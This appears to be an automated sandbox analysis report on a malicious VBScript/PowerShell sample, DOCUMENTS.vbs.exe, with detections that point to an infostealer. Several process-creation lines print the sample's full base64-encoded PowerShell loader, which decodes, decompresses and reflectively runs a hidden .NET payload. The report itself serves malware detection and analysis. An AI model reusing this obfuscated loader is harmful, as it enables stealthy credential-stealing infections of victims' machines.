AGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2337
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2346
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2346
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2337	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2346	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2346

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0DE40 NtProtectVirtualMemory,	4_2_08F0DE40
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0F330 NtResumeThread,	4_2_08F0F330
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0DE38 NtProtectVirtualMemory,	4_2_08F0DE38
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0F328 NtResumeThread,	4_2_08F0F328

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0495FA70	4_2_0495FA70
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0495C7CB	4_2_0495C7CB
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0495C112	4_2_0495C112
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0495E970	4_2_0495E970
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07471400	4_2_07471400
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0812A608	4_2_0812A608
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0812B8B8	4_2_0812B8B8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08126330	4_2_08126330
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08126340	4_2_08126340
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E7F138	4_2_08E7F138
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E767A8	4_2_08E767A8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E70040	4_2_08E70040
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E70006	4_2_08E70006
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E76D88	4_2_08E76D88
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E76D98	4_2_08E76D98
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E76798	4_2_08E76798
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E75300	4_2_08E75300
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F070A8	4_2_08F070A8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F019D0	4_2_08F019D0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0BB98	4_2_08F0BB98
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0AF68	4_2_08F0AF68
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F07097	4_2_08F07097
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0BC0F	4_2_08F0BC0F
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F08620	4_2_08F08620
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F08611	4_2_08F08611
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0AF58	4_2_08F0AF58
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F121E0	4_2_08F121E0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1B2F8	4_2_08F1B2F8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F19470	4_2_08F19470
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F115D0	4_2_08F115D0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1BE68	4_2_08F1BE68
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F121D1	4_2_08F121D1
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1A2F0	4_2_08F1A2F0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1B2E8	4_2_08F1B2E8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1A2EF	4_2_08F1A2EF
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1FA40	4_2_08F1FA40
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1FA30	4_2_08F1FA30
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F124CC	4_2_08F124CC
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F19461	4_2_08F19461
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1243D	4_2_08F1243D
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F115C0	4_2_08F115C0
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F126F8	4_2_08F126F8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F126E8	4_2_08F126E8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1BE60	4_2_08F1BE60
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0906E9A8	4_2_0906E9A8
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0906003F	4_2_0906003F
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_09060040	4_2_09060040
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_0906FB10	4_2_0906FB10
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07472B74	4_2_07472B74
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07472B28	4_2_07472B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_02FC4AC0	7_2_02FC4AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_02FC3EA8	7_2_02FC3EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_02FCACFF	7_2_02FCACFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_02FCEC09	7_2_02FCEC09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_02FC41F0	7_2_02FC41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A85628	7_2_06A85628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A87E00	7_2_06A87E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A86678	7_2_06A86678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A8B2B8	7_2_06A8B2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A8C220	7_2_06A8C220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A830F0	7_2_06A830F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A87720	7_2_06A87720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06A8E438	7_2_06A8E438
